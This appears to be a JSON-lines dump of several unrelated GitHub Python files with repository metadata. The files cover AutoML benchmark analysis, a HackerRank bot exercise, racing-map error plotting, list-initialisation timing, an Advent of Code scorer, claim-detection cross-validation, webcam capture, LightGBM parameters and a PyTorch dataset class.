get_recall\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import time_score2\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_avg_runtime\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_optimum_avg_runtime\n\nfrom sklearn.metrics import make_scorer\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import tree\nfrom sklearn.tree import export_graphviz\nfrom subprocess import call\nfrom sklearn.model_selection import LeaveOneGroupOut\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport copy\nimport glob\nimport matplotlib.pyplot as plt\n\ndef is_pareto_efficient_simple(costs):\n \"\"\"\n Find the pareto-efficient points\n :param costs: An (n_points, n_costs) array\n :return: A (n_points, ) boolean array, indicating whether each point is Pareto efficient\n \"\"\"\n is_efficient = np.ones(costs.shape[0], dtype = bool)\n for i, c in enumerate(costs):\n if is_efficient[i]:\n is_efficient[is_efficient] = np.any(costs[is_efficient] 0 and 'success_test' in exp_results[-1] and exp_results[-1]['success_test'] == True #also on test satisfied\n\ndef is_successfull_validation(exp_results):\n\treturn len(exp_results) > 0 and 'Validation_Satisfied' in exp_results[-1] # constraints were satisfied on validation set\n\nnumber_ml_scenarios = 1200\nrun_count = 0\nfor efolder in 
efolder in 
experiment_folders:\n\trun_folders = sorted(glob.glob(efolder + \"*/\"))\n\tfor rfolder in run_folders:\n\t\ttry:\n\t\t\tinfo_dict = pickle.load(open(rfolder + 'run_info.pickle', \"rb\"))\n\t\t\trun_strategies_success_test = {}\n\t\t\trun_strategies_times = {}\n\t\t\trun_strategies_success_validation = {}\n\n\t\t\tvalidation_satisfied_by_any_strategy = False\n\n\t\t\tmin_time = np.inf\n\t\t\tbest_strategy = 0\n\t\t\tfor s in range(1, len(mappnames) + 1):\n\t\t\t\texp_results = []\n\t\t\t\ttry:\n\t\t\t\t\texp_results = load_pickle(rfolder + 'strategy' + str(s) + '.pickle')\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\tif is_successfull_validation_and_test(exp_results):\n\t\t\t\t\truntime = exp_results[-1]['final_time']\n\t\t\t\t\tif runtime < min_time:\n\t\t\t\t\t\tmin_time = runtime\n\t\t\t\t\t\tbest_strategy = s\n\n\t\t\t\t\trun_strategies_success_test[s] = True\n\t\t\t\t\trun_strategies_times[s] = runtime\n\t\t\t\telse:\n\t\t\t\t\trun_strategies_success_test[s] = False\n\n\t\t\t\trun_strategies_success_validation[s] = is_successfull_validation(exp_results)\n\t\t\t\tif run_strategies_success_validation[s]:\n\t\t\t\t\tvalidation_satisfied_by_any_strategy = True\n\n\t\t\tdataset['success_value'].append(run_strategies_success_test)\n\t\t\tdataset['success_value_validation'].append(run_strategies_success_validation)\n\t\t\tdataset['best_strategy'].append(best_strategy)\n\t\t\tdataset['times_value'].append(run_strategies_times)\n\t\t\tdataset['validation_satisfied'].append(validation_satisfied_by_any_strategy)\n\n\t\t\tdataset['max_search_time'].append(info_dict['constraint_set_list']['search_time'])\n\t\t\tdataset['dataset_id'].append(info_dict['dataset_id'])\n\n\t\t\trun_count += 1\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\tif run_count == number_ml_scenarios:\n\t\t\tbreak\n\tif run_count == number_ml_scenarios:\n\t\tbreak\n\nassert len(dataset['success_value']) == len(dataset['best_strategy'])\n\njoined_strategies = []\n\n\nmap_data_2_fastest = {}\n\nfor run in range(len(dataset['best_strategy'])):\n\tif dataset['best_strategy'][run] != 0:\n\t\tfor s in range(1, len(mappnames) + 1):\n\n\t\t\tif not dataset['dataset_id'][run] in map_data_2_fastest:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]] = {}\n\t\t\tif not s in map_data_2_fastest[dataset['dataset_id'][run]]:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s] = []\n\n\t\t\tif s == dataset['best_strategy'][run]:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s].append(True)\n\t\t\telse:\n\t\t\t\tmap_data_2_fastest[dataset['dataset_id'][run]][s].append(False)\n\n\n\nprint(map_data_2_fastest)\n\n\n\ndata = {}\n\nlatex = \"\"\n\n\n#\\putpie{\\pie{benchmark}{20/TPE(Variance),}\\hfill\ncountizt = 1\nfor key_data, value_data in map_data_2_fastest.items():\n\tlatex += \"\\putpie{\\pie{}{\"\n\tfor i in range(1, len(mappnames) + 1):\n\t\tpercent_fastest = (np.sum(value_data[i]) / float(len(value_data[i])) *100)\n\t\tif percent_fastest > 0:\n\t\t\tlatex += str(percent_fastest) + \"/\" + str(mappnames[i]) + ','\n\n\tlatex += \"}}{\" + map_dataset2name[key_data] +\"}\"\n\tif countizt % 4 != 0:\n\t\tlatex += '\\hfill\\n'\n\telse:\n\t\tlatex += \"\\\\\\\\[2ex]\\n\"\n\tcountizt += 
1\n\nprint(latex)","repo_name":"BigDaMa/DFS","sub_path":"new_project/fastsklearnfeature/interactiveAutoML/new_bench/multiobjective/metalearning/analyse/for_validation/strategy_fastest_piechart_per_dataset_val.py","file_name":"strategy_fastest_piechart_per_dataset_val.py","file_ext":"py","file_size_in_byte":8131,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"42971171315","text":"#!/usr/bin/python\n\n# Head ends here\n\ndef update_position(posr, posc, board, move):\n if(move == \"CLEAN\"):\n return()\n elif(move == \"RIGHT\"):\n aux = list(board[posr])\n aux[posc] = \"-\"\n aux[posc+1] = \"b\"\n \n board[posr] = \"\".join(aux)\n posc = posc+1\n elif(move == \"LEFT\"):\n aux = list(board[posr])\n aux[posc] = \"-\"\n aux[posc-1] = \"b\"\n \n board[posr] = \"\".join(aux)\n posc = posc-1\n elif(move == \"UP\"):\n aux = list(board[posr])\n aux2 = list(board[posr-1])\n aux[posc] = \"-\"\n aux2[posc] = \"b\"\n \n board[posr] = \"\".join(aux)\n board[posr-1] = \"\".join(aux2)\n posr = posr - 1\n elif(move == \"DOWN\"):\n aux = list(board[posr])\n aux2 = list(board[posr+1])\n aux[posc] = \"-\"\n aux2[posc] = \"b\"\n \n board[posr] = \"\".join(aux)\n board[posr+1] = \"\".join(aux2)\n posr = posr + 1\n \n return(posr, posc, board)\n\ndef next_move(posr, posc, board):\n if(board[posr][posc] == \"d\"):\n return(\"CLEAN\")\n \n # find all dirty cell positions\n dirties_pos = []\n for idx,value in enumerate(board):\n if(\"d\" in value):\n for col in [i for i,j in enumerate(list(value)) if j==\"d\"]:\n dirties_pos.append([idx,col])\n if(len(dirties_pos)==0):\n return()\n \n # find nearest position\n min_pos = []\n min_dis = 100\n for d in dirties_pos:\n cur_dis = abs(d[0] - posr) + abs(d[1] - posc)\n if(cur_dis < min_dis):\n min_dis = cur_dis\n min_pos = d\n \n direction_h = posc - min_pos[1]\n direction_v = posr - min_pos[0]\n\n if(direction_h < 0):\n return(\"RIGHT\")\n elif(direction_h > 0):\n return(\"LEFT\")\n\n if(direction_v < 0):\n return(\"DOWN\")\n elif(direction_v > 0):\n return(\"UP\")\n\n# Tail starts here\n\nif __name__ == \"__main__\":\n pos = [int(i) for i in input().strip().split()]\n board = [[j for j in input().strip()] for i in range(5)]\n print(next_move(pos[0], pos[1], board))\n\n# i = 0\n# while(\"d\" in \"\".join(board)): \n# move = next_move(pos[0], pos[1], board)\n# pos[0], pos[1], board = update_position(pos[0], pos[1], board, move)\n# print()\n# print(str(i) + \": \" + move)\n# for row in board:\n# print(row)\n \n# i = i + 1 \n","repo_name":"d-gaspar/HackerRank","sub_path":"Artificial_Intelligence/BotClean.py","file_name":"BotClean.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75192374121","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\nfrom scipy import interpolate\nfrom LocalMapRacing.Utilities.utils import ensure_path_exists\n\n\nclass MapCenterline:\n def __init__(self, map_name):\n track = []\n with open(\"maps/\" + map_name + \"_trueCenterline.csv\", 'r') as file:\n csvFile = csv.reader(file)\n for i, line in enumerate(csvFile):\n if i ==0: continue\n track.append(line)\n\n track = np.array(track).astype(np.float64)\n self.track = np.insert(track, 0, [0, 0, 0.95, 0.95, 0, -1], axis=0)\n self.nvecs = self.track[:, 4:6]\n\n diffs = np.diff(self.track[:, :2], axis=0)\n seg_lengths = np.linalg.norm(np.diff(self.track[:, :2], axis=0), axis=1)\n seg_lengths = 
np.linalg.norm(diffs, axis=1)\n self.s_track = np.insert(np.cumsum(seg_lengths), 0, 0)\n\n self.tck, t_glob = interpolate.splprep([self.track[:, 0], self.track[:, 1]], k=3, s=0)[:2]\n\n print(self.track[0])\n\n def plot_centerline(self):\n plt.figure(1)\n plt.plot(self.track[:,0], self.track[:,1], 'r-')\n l1 = self.track[:, :2] + self.track[:, 2][:, None] * self.nvecs\n l2 = self.track[:, :2] - self.track[:, 3][:, None] * self.nvecs\n plt.plot(l1[:,0], l1[:,1], 'b-')\n plt.plot(l2[:,0], l2[:,1], 'b-')\n\n plt.show()\n\n def calucalte_center_point(self, point):\n idx, distances = self.get_trackline_segment(point)\n x, h = self.interp_pts(idx, distances)\n s = (self.s_track[idx] + x) / self.s_track[-1]\n\n c_point = interpolate.splev(s, self.tck)\n h_true = np.linalg.norm(c_point - point)\n\n return c_point, s, h_true\n\n def get_trackline_segment(self, point):\n \"\"\"Returns the first index representing the line segment that is closest to the point.\n\n wpt1 = pts[idx]\n wpt2 = pts[idx+1]\n\n dists: the distance from the point to each of the wpts.\n \"\"\"\n dists = np.linalg.norm(point - self.track[:, :2], axis=1)\n\n min_dist_segment = np.argmin(dists)\n if min_dist_segment == 0:\n return 0, dists\n elif min_dist_segment == len(dists)-1:\n return len(dists)-2, dists \n\n if dists[min_dist_segment+1] < dists[min_dist_segment-1]:\n return min_dist_segment, dists\n else: \n return min_dist_segment - 1, dists\n\n def interp_pts(self, idx, dists):\n if idx == len(self.s_track) - 1:\n return 0, 0\n d_ss = self.s_track[idx+1] - self.s_track[idx]\n d1, d2 = dists[idx], dists[idx+1]\n\n if d1 < 0.01: # at the first point\n x = 0 \n h = 0\n elif d2 < 0.01: # at the second point\n x = dists[idx] # the distance to the previous point\n h = 0 # there is no distance\n else: # if the point is somewhere along the line\n s = (d_ss + d1 + d2)/2\n Area_square = (s*(s-d1)*(s-d2)*(s-d_ss))\n if Area_square < 0: # negative due to floating point precision\n h = 0\n x = d_ss + d1\n else:\n Area = Area_square**0.5\n h = Area * 2/d_ss\n x = (d1**2 - h**2)**0.5\n\n return x, h\n\n def plot_projection(self, pt):\n c_point, s, h_true = self.calucalte_center_point(pt)\n plt.plot(c_point[0], c_point[1], 'ro')\n plt.plot(pt[0], pt[1], 'go', markersize=5)\n xs = [pt[0], c_point[0]]\n ys = [pt[1], c_point[1]]\n plt.plot(xs, ys, '--', color='orange')\n\ndef calculate_centerline_area_error(name):\n map_name = \"aut\"\n map_centerline = MapCenterline(map_name)\n\n path = f\"Data/{name}/\"\n\n lm_path = path + \"LocalMapError/\"\n ensure_path_exists(lm_path)\n \n map_root = path + f\"LocalMapData_{map_name.upper()}/\"\n history = np.load(path + \"TestingAUT/\" + f\"Lap_0_history_{name}.npy\")\n states = history[:, 0:7]\n actions = history[:, 7:9]\n\n lm_errors = []\n for i in range(1, 260):\n file = map_root + f\"local_map_{i}.npy\"\n try:\n local_track = np.load(file)\n except Exception as e: \n print(e)\n break\n\n distances, progresses = [], []\n c_points = []\n position = states[i, 0:2]\n transformed_lm = []\n heading = states[i, 4]\n rotation_matrix = np.array([[np.cos(heading), -np.sin(heading)], \n [np.sin(heading), np.cos(heading)]])\n t_lm = np.matmul(rotation_matrix, local_track[:, :2].T).T\n for k in range(len(local_track)):\n pt = position + t_lm[k]\n transformed_lm.append(pt)\n c_point, s, h_true = map_centerline.calucalte_center_point(pt)\n distances.append(h_true)\n progresses.append(s)\n c_points.append(c_point)\n\n mean_dist = np.mean(distances)\n print(f\"Step {i}: {mean_dist}\")\n if mean_dist < 2:\n 
lm_errors.append(mean_dist)\n\n np.save(path + f\"local_map_error_{name}.npy\", lm_errors)\n\n plt.plot(lm_errors)\n\n plt.savefig(path + f\"local_map_error_{name}.svg\")\n\n\ndef calculate_centerline_area_error_plot(name):\n map_name = \"aut\"\n map_centerline = MapCenterline(map_name)\n\n path = f\"Data/{name}/\"\n\n lm_path = path + \"LocalMapError/\"\n ensure_path_exists(lm_path)\n \n map_root = path + f\"LocalMapData_{map_name.upper()}/\"\n history = np.load(path + \"TestingAUT/\" + f\"Lap_0_history_{name}.npy\")\n states = history[:, 0:7]\n actions = history[:, 7:9]\n\n lm_errors = []\n for i in range(1, 260):\n file = map_root + f\"local_map_{i}.npy\"\n try:\n local_track = np.load(file)\n except: break\n\n plt.figure(1)\n plt.clf()\n plt.title(f\"Step {i}\")\n plt.plot(map_centerline.track[:,0], map_centerline.track[:,1], 'r-')\n\n distances, progresses = [], []\n c_points = []\n position = states[i, 0:2]\n transformed_lm = []\n heading = states[i, 4]\n rotation_matrix = np.array([[np.cos(heading), -np.sin(heading)], \n [np.sin(heading), np.cos(heading)]])\n t_lm = np.matmul(rotation_matrix, local_track[:, :2].T).T\n for k in range(len(local_track)):\n pt = position + t_lm[k]\n transformed_lm.append(pt)\n c_point, s, h_true = map_centerline.calucalte_center_point(pt)\n distances.append(h_true)\n progresses.append(s)\n c_points.append(c_point)\n map_centerline.plot_projection(pt)\n\n transformed_lm = np.array(transformed_lm)\n plt.plot(transformed_lm[:,0], transformed_lm[:,1], 'g-')\n plt.xlim(np.min(transformed_lm[:, 0]) - 1, np.max(transformed_lm[:, 0]) + 1)\n plt.ylim(np.min(transformed_lm[:, 1]) - 1, np.max(transformed_lm[:, 1]) + 1)\n # plt.show()\n\n plt.savefig(lm_path + f\"local_map_error_{i}.svg\")\n\n\n np.save(path + f\"local_map_error_{name}.npy\", lm_errors)\n\n plt.plot(lm_errors)\n\n plt.savefig(path + f\"local_map_error_{name}.svg\")\n\n\n# calculate_centerline_area_error(\"LocalCenter_1\")\ncalculate_centerline_area_error_plot(\"LocalCenter_1\")","repo_name":"BDEvan5/LocalMapRacing","sub_path":"LocalMapRacing/DataTools/CalculateCenterLineError.py","file_name":"CalculateCenterLineError.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26371049600","text":"# import time module to calculate times \nimport time \n \n# initialise lists to save the times \nforLoopTime = [] \nwhileLoopTime = [] \nlistComprehensionTime = [] \nstarOperatorTime = [] \n \n# repeat the process for 500 times \n# and calculate average of times taken. 
\nfor k in range(500): \n \n # start time \n start = time.time() \n # declare empty list \n a = [] \n # run a for loop for 10000 times \n for i in range(10000): \n a.append(0) \n # stop time \n stop = time.time() \n forLoopTime.append(stop-start) \n \n # start time \n start = time.time() \n # declare an empty list \n a = [] \n i = 0\n # run a for loop 10000 times \n while(i<10000): \n a.append(0) \n i+= 1\n stop = time.time() \n whileLoopTime.append(stop-start) \n \n start = time.time() \n # list comprehension to initialize list \n a = [0 for i in range(10000)] \n stop = time.time() \n listComprehensionTime.append(stop-start) \n \n \n start = time.time() \n # using the * operator \n a = [0]*10000 \n stop = time.time() \n starOperatorTime.append(stop-start) \n \n \n \nprint(\"Average time taken by for loop: \" + str(sum(forLoopTime)/500)) \nprint(\"Average time taken by while loop: \" + str(sum(whileLoopTime)/500)) \nprint(\"Average time taken by list comprehensions: \" + str(sum(listComprehensionTime)/500)) \nprint(\"Average time taken by * operator: \" + str(sum(starOperatorTime)/500))\ninput()\n","repo_name":"Syed-Azam/Self_Learning_Creativity","sub_path":"Efficiency_Calculator.py","file_name":"Efficiency_Calculator.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"40440109967","text":"# rock = A = X = 1\n# paper = B = Y = 2\n# scissors = C = Z = 3\n# lose = 0\n# draw = 3\n# win = 6\n\n# total = shape selected (col 2) + result from col 2 perspective\n\n# Wins\n# Rock beats Scissors (C X)\n# Scissors beats Paper (B Z)\n# Paper beats Rock (A Y)\n\n# Ties \n# (A X)\n# (B Y)\n# (C Z)\n\n# Losses \n# Rock beats Scissors (A Z)\n# Scissors beats Paper (C Y)\n# Paper beats Rock (B X)\n\n# example: \n# A Y --> 8\n# B X --> 1\n# C Z --> 6\n# total score: 15\n\n# all possible wins, ties, losses, and second letters\nkey = {\n \"CX\": 6,\n \"BZ\": 6,\n \"AY\": 6,\n \"AX\": 3,\n \"BY\": 3,\n \"CZ\": 3,\n \"AZ\": 0,\n \"CY\": 0,\n \"BX\": 0,\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\ntotal_score = 0\n\nwith open('data.txt', 'r', encoding=\"utf-8\") as f:\n lines = f.readlines()\n\n for line in lines:\n # strip spaces and newlines\n parsed = line.replace(\" \", \"\").strip()\n # look up score for letter combo + final letter and add it to the \n # running total\n total_score += (key[parsed] + key[parsed[-1]])\n\nprint(total_score)","repo_name":"stocktons/advent-of-code-2022","sub_path":"day-02/rochambeau.py","file_name":"rochambeau.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8189078504","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport xarray as xr\nfrom sklearn.model_selection import LeaveOneOut\n\nfrom models.model_base import DetektorModel\nfrom project_paths import ProjectPaths\nfrom evaluations import Accuracy, F1, TruePositives, TrueNegatives, FalsePositives, FalseNegatives, Samples, \\\n AreaUnderROC\nfrom evaluations.area_roc import plot_roc, ROC, plot_multiple_rocs, mean_rocs\nfrom models.baselines import MLP, LogisticRegression, LogisticRegressionSK\nfrom models.recurrent.basic_recurrent import BasicRecurrent\nfrom models.PositiveLearningElkan.pu_learning import PULogisticRegressionSK\nfrom util.tensor_provider import TensorProvider\nfrom util.utilities import ensure_folder, save_fig\n\n\ndef leave_one_program_out_cv(tensor_provider, 
model_list, path,\n eval_functions=None, limit=None, return_predictions=False,\n save_ranked_sentences=True, save_full_predictions=True,\n save_model_weights=True):\n \"\"\"\n :param TensorProvider tensor_provider: Class providing all data to models.\n :param list[DetektorModel] model_list: List of model-classes for testing.\n :param list[Evaluation] eval_functions: List of evaluation functions used to test models.\n :param bool return_predictions: If True, the method stores all model test-predictions and returns them as well.\n Can be used to determine whether errors are the same across models.\n :param int | None limit: Only perform analysis on some programs (for testing)\n If None - run on all programs.\n :param Path path: Path for storing results\n :return:\n \"\"\"\n ensure_folder(path)\n\n # TODO: Consider also looping over loss-functions: classic ones and weighed ones\n n_models = len(model_list)\n\n # Default evaluation score\n if eval_functions is None:\n eval_functions = [Accuracy(), F1(), TruePositives(), TrueNegatives(), FalsePositives(), FalseNegatives(),\n Samples(), AreaUnderROC(), ROC()]\n\n # Elements keys\n keys = list(sorted(tensor_provider.accessible_annotated_keys))\n\n # Get program ids and number of programs\n program_ids = np.array(list(zip(*keys))[0])\n unique_programs = np.array(sorted(set(program_ids)))\n n_programs = len(unique_programs)\n program_names = [\"P{:02d}\".format(val + 1) for val in range(n_programs)]\n\n # Dictionary for holding actual predictions (they vary in length which discourages an array)\n test_predictions = dict()\n\n # Initialize array for holding results\n special_results = dict()\n evaluation_names = [val.name() for val in eval_functions if val.is_single_value]\n classification_results = np.full((n_programs, n_models, len(evaluation_names)), np.nan)\n classification_results = xr.DataArray(classification_results,\n name=\"Loo Results\",\n dims=[\"Program\", \"Model\", \"Evaluation\"],\n coords=dict(Program=program_names,\n Model=[model.name for model in model_list],\n Evaluation=evaluation_names))\n\n # Initialize file for storing ranked sentences\n if save_ranked_sentences:\n rank_file = Path(path, \"ranked_sentences.txt\").open(\"w\")\n\n # Loop over programs\n loo = LeaveOneOut()\n limit = len(unique_programs) if limit is None else limit\n print(\"\\n\\nRunning Leave-One-Out Tests.\\n\" + \"-\" * 75)\n for program_nr, (train, test) in enumerate(list(loo.split(unique_programs))[:limit]):\n program_name = program_names[program_nr]\n\n # Get split indices\n train_idx = np.where(program_ids != unique_programs[test])[0]\n test_idx = np.where(program_ids == unique_programs[test])[0]\n\n # Convert to keys\n train_idx = [keys[val] for val in train_idx]\n test_idx = [keys[val] for val in test_idx]\n\n # Report\n print(\"Program {}, using {} training samples and {} test samples.\".format(program_nr + 1,\n len(train_idx),\n len(test_idx)))\n\n # Make and set BoW-vocabulary\n bow_vocabulary = tensor_provider.extract_programs_vocabulary(train_idx)\n tensor_provider.set_bow_vocabulary(bow_vocabulary)\n\n # Get truth of test-set\n y_true = tensor_provider.load_labels(data_keys_or_idx=test_idx)\n\n # Go through models\n for model_nr, model in enumerate(model_list):\n model_name = model.name\n\n # Initialize model\n model.initialize_model(tensor_provider=tensor_provider)\n\n # Fit model\n model.fit(tensor_provider=tensor_provider,\n train_idx=train_idx,\n verbose=2)\n\n # Predict on test-data for performance\n y_pred, y_pred_binary = 
model.predict(tensor_provider=tensor_provider,\n predict_idx=test_idx)\n y_pred = np.squeeze(y_pred)\n y_pred_binary = np.squeeze(y_pred_binary)\n\n # Store predictions\n if return_predictions:\n test_predictions.setdefault(model_name, dict())[program_name] = y_pred\n\n # Save the best ranked senteces (in terms of claim)\n if save_ranked_sentences:\n rank_file.write(\"Test program: %s \\n\" % program_names[program_nr])\n rank_file.write(model.summary_to_string())\n ranked_sentences, rank_score, rank_indices \\\n = tensor_provider.get_ranked_predictions(y_pred, test_idx)\n rank_file.write(\"Sentence, Proability of claim, Truth \\n\")\n ranked_labels = tensor_provider.load_labels(rank_indices)\n for r in range(len(ranked_sentences)):\n rank_file.write(\"%s , %.5f, %i \\n\" % (ranked_sentences[r], rank_score[r], ranked_labels[r]))\n rank_file.write(\"\\n\")\n\n # Save predictions on full test set\n if save_full_predictions:\n with Path(path, \"%s_predictions.txt\" % program_names[program_nr]).open(\"w\") as file:\n all_sentences = tensor_provider.load_original_sentences(test_idx)\n for r in range(len(all_sentences)):\n file.write(\"%i;%.5f;%s\\n\" % (y_true[r], y_pred[r], all_sentences[r]))\n\n # Save model weights in case of logistic regression\n if save_model_weights and model_name == \"LogisticRegressionSKLEARN\":\n # TODO: Save most important weights in classification\n print(' ')\n\n # Evaluate with eval_functions\n evaluation_nr = 0\n for evalf in eval_functions:\n assert y_pred.shape == y_true.shape, \"y_pred ({}) and y_true ({}) \" \\\n \"do not have same shape\".format(y_pred.shape, y_true.shape)\n\n if evalf.is_single_value:\n evaluation_result = evalf(y_true=y_true,\n y_pred=y_pred,\n y_pred_binary=y_pred_binary)\n classification_results[program_nr, model_nr, evaluation_nr] = evaluation_result\n evaluation_nr += 1\n else:\n special_results[(model.name, evalf.name(), program_nr)] = evalf(y_true=y_true,\n y_pred=y_pred,\n y_pred_binary=y_pred_binary)\n ###\n # Plot ROC curves if wanted\n\n # Go through models\n models_mean_rocs = []\n for model in model_list:\n rocs = []\n labels = []\n\n # Go through programs\n for program_nr in range(len(unique_programs)):\n key = (model.name, \"ROC\", program_nr)\n if key in special_results:\n rocs.append(special_results[key])\n labels.append(\"Program {}\".format(program_nr))\n\n # Plot ROCs for each program for this model\n plot_multiple_rocs(rocs=rocs, labels=labels, center_line=False)\n mean = mean_rocs(rocs)\n models_mean_rocs.append(mean)\n plot_roc(*mean, title=model.name, label=\"Mean\",\n color=\"black\", linestyle=\"--\")\n plt.legend()\n\n # Store figure\n file_name = \"ROC_{}\".format(model.name)\n save_fig(Path(path, file_name))\n plt.close()\n\n # Plot mean-ROCs for models\n names = [model.name for model in model_list]\n plot_multiple_rocs(rocs=models_mean_rocs, labels=names, center_line=True,\n title=\"Models Mean-ROC\")\n plt.legend()\n save_fig(Path(path, \"Models_ROC\"))\n plt.close()\n\n if save_ranked_sentences:\n rank_file.close()\n\n if return_predictions:\n return classification_results, special_results, test_predictions\n return classification_results, special_results\n\n\nif __name__ == \"__main__\":\n # Initialize tensor-provider (data-source)\n the_tensor_provider = TensorProvider(verbose=True)\n\n # Choose number of programs to run though (None for all)\n program_limit = None\n\n # Choose models\n models = [\n #PULogisticRegressionSK(tensor_provider=the_tensor_provider)\n MLP(tensor_provider=the_tensor_provider)\n ]\n\n 
# Run LOO-program\n loo_path = Path(ProjectPaths.results, \"LOO_CV\")\n results, s_results = leave_one_program_out_cv(\n tensor_provider=the_tensor_provider,\n model_list=models,\n limit=program_limit,\n path=loo_path\n ) # type: xr.DataArray\n\n # Get mean-results over programs\n mean_results = results.mean(\"Program\")\n mean_results.name = \"Mean Loo Results\"\n mean_results = mean_results._to_dataset_split(\"Model\").to_dataframe()\n\n # Print mean results\n print(\"\\nMean LOO Results\\n\" + \"-\" * 75)\n with Path(loo_path, \"mean_results.txt\").open(\"w\") as file:\n file.write(str(mean_results))\n print(mean_results)\n","repo_name":"DTUComputeCognitiveSystems/deep_detektor","sub_path":"run_files/loo_cv.py","file_name":"loo_cv.py","file_ext":"py","file_size_in_byte":10357,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"43161281780","text":"import cv2\n\ncap = cv2.VideoCapture(0)\n\nwhile cap.isOpened():\n ret, cam = cap.read() #ret -> True or False\n if ret:\n cv2.imshow(\"image\", cam)\n if cv2.waitKey(5) == ord(\"s\"):\n #save the image\n cv2.imwrite('image.jpg',cam)\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"haseeb-kp/ML","sub_path":"invisible cloak/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70645499561","text":"# -*- coding: utf-8 -*-\n# @Time : 2020-02-21 16:04\n# @Author : HuangSir\n# @FileName: lgbParam.py\n# @Software: PyCharm\n# @Desc:lgb parameters\n\nfrom hyperopt import hp\nimport numpy as np\n\nselectFeatures = 25 # controls the number of features\nearlyStopping = 50 # controls early stopping\nmax_evals = 20 # number of tuning iterations\nselect_num_boost_round = 1000 # training rounds for feature selection\nvalTime = 20200120 # date used to split off the validation set\n\n# manually drop paid and unstable variables\ndrop_col = ['iziScore','ad730Score','dianXinScore','company_province','identity_province','phoneverify']\n\n# initial parameters\nselfParam = {\n 'objective':'binary', # binary classification (the default is regression)\n 'boosting':'dart', # algorithm type: gbdt, dart\n 'learning_rate':0.01, # learning rate\n 'max_depth':6, # maximum tree depth\n 'num_leaves':32, # 2**6 = 64\n 'max_cat_threshold':10, # limits the number of categories for categorical features\n 'min_data_in_leaf':30, # minimum samples per leaf\n 'feature_fraction':0.7, # fraction of features per iteration\n 'bagging_fraction':0.8, # fraction of samples per iteration \n 'num_threads':8,\n 'min_data_in_bin':30, # minimum data per bin\n 'max_bin':256, # maximum number of bins # hyperparameter\n 'is_unbalance':True, # unbalanced samples\n 'metric':'auc',\n 'train_metric':True,\n 'verbose':-1,\n}\n\n# hyperparameter search space\nspaceParam = {\n 'boosting': hp.choice('boosting',['gbdt','dart']),\n 'learning_rate': hp.loguniform('learning_rate', np.log(0.01), np.log(0.05)),\n 'max_bin':hp.quniform('max_bin',100,300,20), # max_bin\n 'num_leaves': hp.quniform('num_leaves', 3, 63, 3), # prefer a smaller num_leaves\n 'feature_fraction': hp.uniform('feature_fraction', 0.7,1), # prefer smaller\n 'min_data_in_leaf': hp.quniform('min_data_in_leaf', 10, 50,5), # prefer larger\n 'num_boost_round':hp.quniform('num_boost_round',500,2000,100), # number of iterations\n 'bagging_fraction':hp.uniform('bagging_fraction',0.6,1) # prefer smaller\n}\n","repo_name":"huangxianyang/lgb-lr-score","sub_path":"lgbParam.py","file_name":"lgbParam.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"10166615864","text":"from argparse import Namespace\nfrom collections import Counter\nimport json\nimport os\nimport re\nimport string\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import 
Dataset, DataLoader\nfrom tqdm import tqdm_notebook\nimport initialization\n\nargs = initialization.utils(frequency_cutoff=25, \n model_state_file='model.pth', \n review_csv='../data/reviews.csv', \n save_dir='../model/',\n vectorizer_file='vectorizer.json', \n batch_size=128, \n early_stopping_criteria=5,\n learning_rate=0.001, \n num_epochs=100, \n seed=1110, \n catch_keyboard_interrupt=True,\n expand_filepaths_to_save_dir=True,\n reload_from_files=False)\n\nclass ReviewDataset(Dataset):\n def __init__(self, review_df, vectorizer):\n \"\"\"\n Args:\n review_df (pandas.DataFrame): the dataset\n vectorizer (ReviewVectorizer): vectorizer instantiated from dataset\n \"\"\"\n self.review_df = review_df\n self._vectorizer = vectorizer\n\n self.train_df = self.review_df[self.review_df.split=='train']\n self.train_size = len(self.train_df)\n\n self.val_df = self.review_df[self.review_df.split=='val']\n self.validation_size = len(self.val_df)\n\n self.test_df = self.review_df[self.review_df.split=='test']\n self.test_size = len(self.test_df)\n\n self._lookup_dict = {'train': (self.train_df, self.train_size),\n 'val': (self.val_df, self.validation_size),\n 'test': (self.test_df, self.test_size)}\n\n self.set_split('train')\n\n @classmethod\n def load_dataset_and_make_vectorizer(cls, review_csv):\n \"\"\"Load dataset and make a new vectorizer from scratch\n \n Args:\n review_csv (str): location of the dataset\n Returns:\n an instance of ReviewDataset\n \"\"\"\n review_df = 